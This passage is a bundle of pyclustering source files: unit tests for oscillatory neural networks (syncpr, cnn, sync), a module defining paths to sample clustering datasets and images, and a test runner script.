syncpr_visualizer.animate_pattern_recognition(output_dynamic, 1, 5);
@staticmethod
def templateMemoryOrder(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
assert net.memory_order(patterns[0]) < 0.8;
assert net.memory_order(patterns[1]) < 0.8;
for pattern in patterns:
net.simulate(20, 10, pattern, solve_type.RK4);
memory_order = net.memory_order(pattern);
assert (memory_order > 0.95) and (memory_order <= 1.000005);
@staticmethod
def templateStaticSimulation(ccore_falg):
net = syncpr(10, 0.1, 0.1, ccore_falg);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
net.simulate_static(20, 10, patterns[0], solve_type.RK4);
memory_order = net.memory_order(patterns[0]);
assert (memory_order > 0.95) and (memory_order <= 1.000005);
@staticmethod
def templateDynamicSimulation(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
net.simulate_dynamic(patterns[0], order = 0.998, solution = solve_type.RK4);
memory_order = net.memory_order(patterns[0]);
assert (memory_order > 0.998) and (memory_order <= 1.0);
@staticmethod
def templateGlobalSyncOrder(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
global_sync_order = net.sync_order();
assert (global_sync_order < 1.0) and (global_sync_order > 0.0);
net.train(patterns);
global_sync_order = net.sync_order();
assert (global_sync_order < 1.0) and (global_sync_order > 0.0);
@staticmethod
def templateLocalSyncOrder(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
local_sync_order = net.sync_local_order();
assert (local_sync_order < 1.0) and (local_sync_order > 0.0);
net.train(patterns);
local_sync_order = net.sync_local_order();
assert (local_sync_order < 1.0) and (local_sync_order > 0.0);
@staticmethod
def templateIncorrectPatternValues(ccore_flag):
patterns = [];
patterns += [ [2, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -2, -1, -1, -1, 1, 1, 1, 1, 1] ];
SyncprTestTemplates.templateIncorrectPatternForTraining(patterns, ccore_flag);
```
#### File: tests/unit/ut_cnn.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.nnet.cnn import type_conn, cnn_network, cnn_visualizer
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
class CnnUnitTest(unittest.TestCase):
def templateSyncEnsembleAllocation(self, stimulus, steps, connection, amount_neighbors, analysed_iterations, expected_length_ensembles):
testing_result = True
for _ in range(3):
network_instance = cnn_network(len(stimulus), connection, amount_neighbors)
assert len(stimulus) == len(network_instance);
output_dynamic = network_instance.simulate(steps, stimulus)
ensembles = output_dynamic.allocate_sync_ensembles(analysed_iterations)
obtained_ensemble_sizes = [len(ensemble) for ensemble in ensembles]
# critical checks - always determined
assert len(stimulus) == len(network_instance)
assert len(stimulus) == sum(obtained_ensemble_sizes)
if expected_length_ensembles is not None:
obtained_ensemble_sizes.sort()
expected_length_ensembles.sort()
if obtained_ensemble_sizes != expected_length_ensembles:
continue
assert testing_result is True;
def testClusteringPhenomenonSimpleSample01(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 3, 10, [5, 5])
def testGlobalSynchronizationSimpleSample01(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 9, 10, [10])
def testDelaunayTriangulationSimpleSample01(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.TRIANGULATION_DELAUNAY, 3, 10, None)
def testClusteringPhenomenonSimpleSample02(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 3, 10, [10, 5, 8])
def testGlobalSynchronizationSimpleSample02(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 22, 10, [10, 5, 8])
def testDelaunayTriangulationSimpleSample02(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.TRIANGULATION_DELAUNAY, 22, 10, None)
def testClusteringPhenomenonSimpleSample03(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 3, 10, [10, 10, 10, 30])
def testClusteringPhenomenonSimpleSample04(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
self.templateSyncEnsembleAllocation(stimulus, 200, type_conn.ALL_TO_ALL, 10, 10, [15, 15, 15, 15, 15])
def testClusteringPhenomenonSimpleSample05(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
self.templateSyncEnsembleAllocation(stimulus, 100, type_conn.ALL_TO_ALL, 5, 10, [15, 15, 15, 15])
def testChaoticNeuralNetwork2DVisualization(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
network_instance = cnn_network(len(stimulus))
output_dynamic = network_instance.simulate(100, stimulus)
network_instance.show_network()
cnn_visualizer.show_dynamic_matrix(output_dynamic)
cnn_visualizer.show_observation_matrix(output_dynamic)
cnn_visualizer.show_output_dynamic(output_dynamic)
def testChaoticNeuralNetwork3DVisualization(self):
stimulus = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE11)
network_instance = cnn_network(len(stimulus))
output_dynamic = network_instance.simulate(10, stimulus)
network_instance.show_network()
cnn_visualizer.show_dynamic_matrix(output_dynamic)
cnn_visualizer.show_observation_matrix(output_dynamic)
cnn_visualizer.show_output_dynamic(output_dynamic)
```
#### File: tests/unit/ut_sync.py
```python
import unittest;
# Generate images without having a window appear.
import matplotlib;
matplotlib.use('Agg');
from pyclustering.nnet.tests.sync_templates import SyncTestTemplates;
from pyclustering.nnet import solve_type, conn_type;
from pyclustering.nnet.sync import sync_network, sync_dynamic, sync_visualizer;
from pyclustering.utils import pi;
class SyncUnitTest(unittest.TestCase):
def testCreateNetwork(self):
SyncTestTemplates.templateCreateNetwork(1, False);
SyncTestTemplates.templateCreateNetwork(10, False);
SyncTestTemplates.templateCreateNetwork(55, False);
def testConnectionsApi(self):
SyncTestTemplates.templateConnectionsApi(1, False);
SyncTestTemplates.templateConnectionsApi(5, False);
SyncTestTemplates.templateConnectionsApi(10, False);
def testSyncOrderSingleOscillator(self):
# Check for order parameter of network with one oscillator
network = sync_network(1, 1, ccore=False);
assert network.sync_order() == 1;
def testSyncOrderNetwork(self):
# Check for order parameter of network with several oscillators
network = sync_network(2, 1, ccore=False);
sync_state = 1;
tolerance = 0.1;
network.simulate(50, 20, solve_type.RK4);
assert (abs(network.sync_order() - sync_state) < tolerance) == True;
def testSyncLocalOrderSingleOscillator(self):
network = sync_network(1, 1);
assert network.sync_local_order() == 0;
def testOutputNormalization(self):
network = sync_network(20, 1, ccore=False);
output_dynamic = network.simulate(50, 20, solve_type.RK4);
t = output_dynamic.time;
dyn = output_dynamic.output;
for iteration in range(len(dyn)):
for index_oscillator in range(len(dyn[iteration])):
assert (dyn[iteration][index_oscillator] >= 0);
assert (dyn[iteration][index_oscillator] <= 2.0 * pi);
def testFastSolution(self):
# Check for convergence when solution using fast way of calculation of derivative
SyncTestTemplates.templateSimulateTest(10, 1, solve_type.FAST, False);
def testRK4Solution(self):
# Check for convergence when solution using RK4 function of calculation of derivative
SyncTestTemplates.templateSimulateTest(10, 1, solve_type.RK4, False);
def testLargeNetwork(self):
# Check for convergence of phases in large network - network that contains large number of oscillators
SyncTestTemplates.templateSimulateTest(128, 1, solve_type.FAST, False);
def testOutputDynamicAroundZero(self):
phases = [ [ 0.01, 0.02, 0.04, 6.27, 6.28, 6.25, 0.03] ];
time = [ 10.0 ];
output_sync_dynamic = sync_dynamic(phases, time, None);
assert len(output_sync_dynamic.allocate_sync_ensembles(0.2)) == 1;
assert len(output_sync_dynamic.allocate_sync_ensembles(0.1)) == 1;
phases = [ [ 1.02, 1.05, 1.52, 5.87, 5.98, 5.14] ];
output_sync_dynamic = sync_dynamic(phases, time, None);
assert len(output_sync_dynamic.allocate_sync_ensembles(3.0)) == 1;
assert len(output_sync_dynamic.allocate_sync_ensembles(2.0)) == 1;
def testDynamicSimulationAllToAll(self):
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(10, 1, conn_type.ALL_TO_ALL, False);
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(50, 1, conn_type.ALL_TO_ALL, False);
def testDynamicSimulationGridFour(self):
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(9, 1, conn_type.GRID_FOUR, False);
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(25, 1, conn_type.GRID_FOUR, False);
def testDynamicSimulationGridEight(self):
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(9, 1, conn_type.GRID_FOUR, False);
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(25, 1, conn_type.GRID_FOUR, False);
def testDynamicSimulationBidir(self):
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(5, 1, conn_type.LIST_BIDIR, False);
SyncTestTemplates.templateDynamicSimulationConnectionTypeTest(10, 1, conn_type.LIST_BIDIR, False);
def testTwoOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(2, 1, conn_type.ALL_TO_ALL, False);
def testThreeOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(3, 1, conn_type.ALL_TO_ALL, False);
def testFourOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(4, 1, conn_type.ALL_TO_ALL, False);
def testFiveOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(5, 1, conn_type.ALL_TO_ALL, False);
def testSixOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(6, 1, conn_type.ALL_TO_ALL, False);
def testSevenOscillatorDynamic(self):
SyncTestTemplates.templateDynamicSimulationConvergence(7, 1, conn_type.ALL_TO_ALL, False);
def testOutputDynamicLengthSimulation(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate(10, 10, solution = solve_type.FAST, collect_dynamic = True);
assert len(output_dynamic) == 11; # 10 steps without initial values.
def testOutputDynamicLengthStaticSimulation(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_static(10, 10, solution = solve_type.FAST, collect_dynamic = True);
assert len(output_dynamic) == 11; # 10 steps without initial values.
def testOutputDynamicLengthStaticSimulationWithouCollecting(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_static(10, 10, solution = solve_type.FAST, collect_dynamic = False);
assert len(output_dynamic) == 1; # 10 steps without initial values.
def testOutputDynamicLengthDynamicSimulation(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_dynamic(solution = solve_type.FAST, collect_dynamic = True);
assert len(output_dynamic) > 1;
def testOutputDynamicLengthDynamicSimulationWithoutCollecting(self):
net = sync_network(5, ccore=False);
output_dynamic = net.simulate_dynamic(solution = solve_type.FAST, collect_dynamic = False);
assert len(output_dynamic) == 1;
def testInfoAllicationWithNoSimulation(self):
output_dynamic = sync_dynamic(None, None, None);
ensembles = output_dynamic.allocate_sync_ensembles();
assert ensembles == [];
matrix = output_dynamic.allocate_correlation_matrix();
assert matrix == [];
def testOutputDynamicCalculateOrderParameter(self):
SyncTestTemplates.templateOutputDynamicCalculateOrderParameter(False);
def testOutputDynamicCalculateLocalOrderParameter(self):
SyncTestTemplates.templateOutputDynamicCalculateLocalOrderParameter(False);
def testVisualizerOrderParameterNoFailures(self):
net = sync_network(10, ccore = False);
output_dynamic = net.simulate_static(20, 10, solution = solve_type.FAST, collect_dynamic = True);
sync_visualizer.show_order_parameter(output_dynamic);
sync_visualizer.show_order_parameter(output_dynamic, 0);
sync_visualizer.show_order_parameter(output_dynamic, 5);
sync_visualizer.show_order_parameter(output_dynamic, 5, 20);
def testVisualizeLocalOrderParameterNoFailures(self):
net = sync_network(10, ccore = False);
output_dynamic = net.simulate_static(20, 10, solution = solve_type.FAST, collect_dynamic = True);
sync_visualizer.show_local_order_parameter(output_dynamic, net);
sync_visualizer.show_local_order_parameter(output_dynamic, net, 0);
sync_visualizer.show_local_order_parameter(output_dynamic, net, 5);
sync_visualizer.show_local_order_parameter(output_dynamic, net, 5, 20);
def testVisualizerNoFailures(self):
SyncTestTemplates.templateVisualizerNoFailures(5, 10, False);
```
#### File: pyclustering/samples/definitions.py
```python
import pyclustering.samples as samples
import os
## Path to samples module.
DEFAULT_SAMPLE_PATH = samples.__path__[0] + os.sep + "samples" + os.sep
class SIMPLE_SAMPLES:
"""!
@brief The Simple Suite offers a variety of simple clustering problems.
@details The samples are supposed to use for unit-testing and common algorithm abilities to found out
run-time problems.
"""
## Simple Sample collection path.
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "simple" + os.sep
SAMPLE_SIMPLE1 = COLLECTION_PATH + "Simple01.data"
SAMPLE_SIMPLE2 = COLLECTION_PATH + "Simple02.data"
SAMPLE_SIMPLE3 = COLLECTION_PATH + "Simple03.data"
SAMPLE_SIMPLE4 = COLLECTION_PATH + "Simple04.data"
SAMPLE_SIMPLE5 = COLLECTION_PATH + "Simple05.data"
SAMPLE_SIMPLE6 = COLLECTION_PATH + "Simple06.data"
SAMPLE_SIMPLE7 = COLLECTION_PATH + "Simple07.data"
SAMPLE_SIMPLE8 = COLLECTION_PATH + "Simple08.data"
SAMPLE_SIMPLE9 = COLLECTION_PATH + "Simple09.data"
SAMPLE_SIMPLE10 = COLLECTION_PATH + "Simple10.data"
SAMPLE_SIMPLE11 = COLLECTION_PATH + "Simple11.data"
SAMPLE_SIMPLE12 = COLLECTION_PATH + "Simple12.data"
SAMPLE_SIMPLE13 = COLLECTION_PATH + "Simple13.data"
SAMPLE_SIMPLE14 = COLLECTION_PATH + "Simple14.data"
SAMPLE_SIMPLE15 = COLLECTION_PATH + "Simple15.data"
SAMPLE_ELONGATE = COLLECTION_PATH + "Elongate.data"
class SIMPLE_ANSWERS:
"""!
@brief Proper clustering results of samples from 'SIMPLE_SAMPLES'.
@see SIMPLE_SAMPLES
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "simple" + os.sep
ANSWER_SIMPLE1 = COLLECTION_PATH + "Simple01.answer"
ANSWER_SIMPLE2 = COLLECTION_PATH + "Simple02.answer"
ANSWER_SIMPLE3 = COLLECTION_PATH + "Simple03.answer"
ANSWER_SIMPLE4 = COLLECTION_PATH + "Simple04.answer"
ANSWER_SIMPLE5 = COLLECTION_PATH + "Simple05.answer"
ANSWER_SIMPLE6 = COLLECTION_PATH + "Simple06.answer"
ANSWER_SIMPLE7 = COLLECTION_PATH + "Simple07.answer"
ANSWER_SIMPLE8 = COLLECTION_PATH + "Simple08.answer"
ANSWER_SIMPLE9 = COLLECTION_PATH + "Simple09.answer"
ANSWER_SIMPLE10 = COLLECTION_PATH + "Simple10.answer"
ANSWER_SIMPLE11 = COLLECTION_PATH + "Simple11.answer"
ANSWER_SIMPLE12 = COLLECTION_PATH + "Simple12.answer"
ANSWER_SIMPLE13 = COLLECTION_PATH + "Simple13.answer"
ANSWER_SIMPLE14 = COLLECTION_PATH + "Simple14.answer"
ANSWER_SIMPLE15 = COLLECTION_PATH + "Simple15.answer"
ANSWER_ELONGATE = COLLECTION_PATH + "Elongate.answer"
class FCPS_SAMPLES:
"""!
@brief The Fundamental Clustering Problems Suite (FCPS) offers a variety of clustering problems any algorithm
shall be able to handle when facing real world data.
@details FCPS serves as an elementary benchmark for clustering algorithms. FCPS consists of data sets with known
a priori classifications that are to be reproduced by the algorithm. All data sets are intentionally created
to be simple and might be visualized in two or three dimensions.
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "fcps" + os.sep
SAMPLE_ATOM = COLLECTION_PATH + "Atom.data"
SAMPLE_CHAINLINK = COLLECTION_PATH + "Chainlink.data"
SAMPLE_ENGY_TIME = COLLECTION_PATH + "EngyTime.data"
SAMPLE_GOLF_BALL = COLLECTION_PATH + "GolfBall.data"
SAMPLE_HEPTA = COLLECTION_PATH + "Hepta.data"
SAMPLE_LSUN = COLLECTION_PATH + "Lsun.data"
SAMPLE_TARGET = COLLECTION_PATH + "Target.data"
SAMPLE_TETRA = COLLECTION_PATH + "Tetra.data"
SAMPLE_TWO_DIAMONDS = COLLECTION_PATH + "TwoDiamonds.data"
SAMPLE_WING_NUT = COLLECTION_PATH + "WingNut.data"
class FAMOUS_SAMPLES:
"""!
@brief The famous suite offers a variety of popular dataset that are mentioned in articles, book, etc.
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "famous" + os.sep
SAMPLE_OLD_FAITHFUL = COLLECTION_PATH + "OldFaithful.data"
SAMPLE_IRIS = COLLECTION_PATH + "Iris.data"
class FAMOUS_ANSWERS:
"""!
@brief Proper clustering results of samples from 'FAMOUS_SAMPLES'.
@see FAMOUS_SAMPLES
"""
COLLECTION_PATH = DEFAULT_SAMPLE_PATH + "famous" + os.sep
ANSWER_IRIS = COLLECTION_PATH + "Iris.answer"
class GRAPH_SIMPLE_SAMPLES:
GRAPH_BROKEN_CIRCLE1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphBrokenCircle1.grpr"
GRAPH_BROKEN_CIRCLE2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphBrokenCircle2.grpr"
GRAPH_FIVE_POINTED_FRAME_STAR = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFivePointedFrameStar.grpr"
GRAPH_FIVE_POINTED_STAR = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFivePointedStar.grpr"
GRAPH_ONE_CIRCLE1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCircle1.grpr"
GRAPH_ONE_CIRCLE2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCircle2.grpr"
GRAPH_ONE_CIRCLE3 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCircle3.grpr"
GRAPH_ONE_CROSSROAD = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneCrossroad.grpr"
GRAPH_ONE_LINE = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphOneLine.grpr"
GRAPH_TWO_CROSSROADS = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphTwoCrossroads.grpr"
GRAPH_FULL1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFull1.grpr"
GRAPH_FULL2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphFull2.grpr"
GRAPH_SIMPLE1 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphSimple1.grpr"
GRAPH_SIMPLE2 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphSimple2.grpr"
GRAPH_SIMPLE3 = samples.__path__[0] + os.sep + "graphs" + os.sep + "GraphSimple3.grpr"
class IMAGE_SIMPLE_SAMPLES:
IMAGE_SIMPLE01 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple01.png"
IMAGE_SIMPLE02 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple02.png"
IMAGE_SIMPLE03 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple03.png"
IMAGE_SIMPLE04 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple04.png"
IMAGE_SIMPLE05 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple05.png"
IMAGE_SIMPLE06 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple06.png"
IMAGE_SIMPLE07 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple07.png"
IMAGE_SIMPLE08 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple08.png"
IMAGE_SIMPLE09 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple09.png"
IMAGE_SIMPLE10 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple10.png"
IMAGE_SIMPLE11 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple11.png"
IMAGE_SIMPLE12 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple12.png"
IMAGE_SIMPLE13 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple13.png"
IMAGE_SIMPLE14 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple14.png"
IMAGE_SIMPLE15 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple15.png"
IMAGE_SIMPLE16 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple16.png"
IMAGE_SIMPLE17 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple17.png"
IMAGE_SIMPLE18 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimple18.png"
IMAGE_SIMPLE_BEACH = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleBeach.png"
IMAGE_SIMPLE_BUILDING = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleBuilding.png"
IMAGE_SIMPLE_FRUITS = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleFruits.png"
IMAGE_SIMPLE_FRUITS_SMALL = samples.__path__[0] + os.sep + "images" + os.sep + "ImageSimpleFruitsSmall.png"
IMAGE_THIN_BLACK_LINES01 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageThinBlackLines01.png"
IMAGE_THIN_BLACK_LINES02 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageThinBlackLines02.png"
IMAGE_THIN_BLACK_LINES03 = samples.__path__[0] + os.sep + "images" + os.sep + "ImageThinBlackLines03.png"
class IMAGE_MAP_SAMPLES:
IMAGE_WHITE_SEA = samples.__path__[0] + os.sep + "images" + os.sep + "ImageWhiteSea.png"
IMAGE_WHITE_SEA_SMALL = samples.__path__[0] + os.sep + "images" + os.sep + "ImageWhiteSeaSmall.png"
IMAGE_NILE = samples.__path__[0] + os.sep + "images" + os.sep + "ImageNile.png"
IMAGE_NILE_SMALL = samples.__path__[0] + os.sep + "images" + os.sep + "ImageNileSmall.png"
IMAGE_BUILDINGS = samples.__path__[0] + os.sep + "images" + os.sep + "ImageBuildings.png"
class IMAGE_REAL_SAMPLES:
IMAGE_FIELD_FLOWER = samples.__path__[0] + os.sep + "images" + os.sep + "ImageFieldFlower.png"
IMAGE_FIELD_TREE = samples.__path__[0] + os.sep + "images" + os.sep + "ImageFieldTree.png"
class IMAGE_SYMBOL_SAMPLES:
@staticmethod
def GET_LIST_IMAGE_SAMPLES(symbol):
default_path = samples.__path__[0] + os.sep + "images" + os.sep + "symbols" + os.sep
number_sample_symbols = 1
name_file_pattern = "Symbol_%s_Sample%.2d.png"
list_image_samples = []
for index_image in range(1, number_sample_symbols + 1, 1):
file_path = default_path + (name_file_pattern % (symbol, index_image))
list_image_samples.append(file_path)
return list_image_samples
LIST_IMAGES_SYMBOL_A = GET_LIST_IMAGE_SAMPLES.__func__('A')
LIST_IMAGES_SYMBOL_B = GET_LIST_IMAGE_SAMPLES.__func__('B')
LIST_IMAGES_SYMBOL_C = GET_LIST_IMAGE_SAMPLES.__func__('C')
LIST_IMAGES_SYMBOL_D = GET_LIST_IMAGE_SAMPLES.__func__('D')
LIST_IMAGES_SYMBOL_E = GET_LIST_IMAGE_SAMPLES.__func__('E')
LIST_IMAGES_SYMBOL_F = GET_LIST_IMAGE_SAMPLES.__func__('F')
LIST_IMAGES_SYMBOL_G = GET_LIST_IMAGE_SAMPLES.__func__('G')
LIST_IMAGES_SYMBOL_H = GET_LIST_IMAGE_SAMPLES.__func__('H')
LIST_IMAGES_SYMBOL_I = GET_LIST_IMAGE_SAMPLES.__func__('I')
LIST_IMAGES_SYMBOL_J = GET_LIST_IMAGE_SAMPLES.__func__('J')
LIST_IMAGES_SYMBOL_K = GET_LIST_IMAGE_SAMPLES.__func__('K')
LIST_IMAGES_SYMBOL_L = GET_LIST_IMAGE_SAMPLES.__func__('L')
LIST_IMAGES_SYMBOL_M = GET_LIST_IMAGE_SAMPLES.__func__('M')
LIST_IMAGES_SYMBOL_N = GET_LIST_IMAGE_SAMPLES.__func__('N')
LIST_IMAGES_SYMBOL_O = GET_LIST_IMAGE_SAMPLES.__func__('O')
LIST_IMAGES_SYMBOL_P = GET_LIST_IMAGE_SAMPLES.__func__('P')
LIST_IMAGES_SYMBOL_Q = GET_LIST_IMAGE_SAMPLES.__func__('Q')
LIST_IMAGES_SYMBOL_R = GET_LIST_IMAGE_SAMPLES.__func__('R')
LIST_IMAGES_SYMBOL_S = GET_LIST_IMAGE_SAMPLES.__func__('S')
LIST_IMAGES_SYMBOL_T = GET_LIST_IMAGE_SAMPLES.__func__('T')
LIST_IMAGES_SYMBOL_U = GET_LIST_IMAGE_SAMPLES.__func__('U')
LIST_IMAGES_SYMBOL_V = GET_LIST_IMAGE_SAMPLES.__func__('V')
LIST_IMAGES_SYMBOL_W = GET_LIST_IMAGE_SAMPLES.__func__('W')
LIST_IMAGES_SYMBOL_X = GET_LIST_IMAGE_SAMPLES.__func__('X')
LIST_IMAGES_SYMBOL_Y = GET_LIST_IMAGE_SAMPLES.__func__('Y')
LIST_IMAGES_SYMBOL_Z = GET_LIST_IMAGE_SAMPLES.__func__('Z')
class IMAGE_DIGIT_SAMPLES:
@staticmethod
def GET_LIST_IMAGE_SAMPLES(digit):
default_path = samples.__path__[0] + os.sep + "images" + os.sep + "digits" + os.sep
number_sample_digits = 25
name_file_pattern = "Digit_%d_Sample%.2d.png"
list_image_samples = []
for index_image in range(1, number_sample_digits + 1, 1):
file_path = default_path + (name_file_pattern % (digit, index_image))
list_image_samples.append(file_path)
return list_image_samples
LIST_IMAGES_DIGIT_0 = GET_LIST_IMAGE_SAMPLES.__func__(0)
LIST_IMAGES_DIGIT_1 = GET_LIST_IMAGE_SAMPLES.__func__(1)
LIST_IMAGES_DIGIT_2 = GET_LIST_IMAGE_SAMPLES.__func__(2)
LIST_IMAGES_DIGIT_3 = GET_LIST_IMAGE_SAMPLES.__func__(3)
LIST_IMAGES_DIGIT_4 = GET_LIST_IMAGE_SAMPLES.__func__(4)
LIST_IMAGES_DIGIT_5 = GET_LIST_IMAGE_SAMPLES.__func__(5)
LIST_IMAGES_DIGIT_6 = GET_LIST_IMAGE_SAMPLES.__func__(6)
LIST_IMAGES_DIGIT_7 = GET_LIST_IMAGE_SAMPLES.__func__(7)
LIST_IMAGES_DIGIT_8 = GET_LIST_IMAGE_SAMPLES.__func__(8)
LIST_IMAGES_DIGIT_9 = GET_LIST_IMAGE_SAMPLES.__func__(9)
```
#### File: pyclustering/tests/tests_runner.py
```python
import enum
import sys
import unittest
import warnings
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.tests.suite_holder import suite_holder
from pyclustering import __PYCLUSTERING_ROOT_DIRECTORY__
class pyclustering_integration_tests(suite_holder):
def __init__(self):
super().__init__()
pyclustering_integration_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(integration_suite):
integration_suite.addTests(unittest.TestLoader().discover(__PYCLUSTERING_ROOT_DIRECTORY__, "it_*.py"))
class pyclustering_unit_tests(suite_holder):
def __init__(self):
super().__init__()
pyclustering_unit_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(unit_suite):
unit_suite.addTests(unittest.TestLoader().discover(__PYCLUSTERING_ROOT_DIRECTORY__, "ut_*.py"))
class pyclustering_tests(suite_holder):
def __init__(self):
super().__init__()
pyclustering_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(pyclustering_suite):
pyclustering_integration_tests.fill_suite(pyclustering_suite)
pyclustering_unit_tests.fill_suite(pyclustering_suite)
class exit_code(enum.IntEnum):
success = 0,
error_unknown_type_test = -1,
error_too_many_arguments = -2,
error_failure = -3
class tests_runner:
@staticmethod
def run():
result = None
return_code = exit_code.success
warnings.filterwarnings('ignore', 'Matplotlib is currently using agg, which is a non-GUI backend, so cannot show the figure.')
if len(sys.argv) == 1:
result = pyclustering_tests().run()
elif len(sys.argv) == 2:
if sys.argv[1] == "--integration":
result = pyclustering_integration_tests().run()
elif sys.argv[1] == "--unit":
result = pyclustering_unit_tests().run()
elif sys.argv[1] == "test":
result = pyclustering_tests().run()
else:
print("Unknown type of test is specified '" + str(sys.argv[1]) + "'.")
return_code = exit_code.error_unknown_type_test
else:
print("Too many arguments '" + str(len(sys.argv)) + "' is used.")
return_code = exit_code.error_too_many_arguments
# Get execution result
if result is not None:
if result.wasSuccessful() is False:
return_code = exit_code.error_failure
exit(return_code)
```
#### File: pyclustering/utils/color.py
```python
class color:
"""!
@brief Consists titles of colors that are used by pyclustering for visualization.
"""
@staticmethod
def get_color(sequential_index):
"""!
@brief Returns color using round robin to avoid out of range exception.
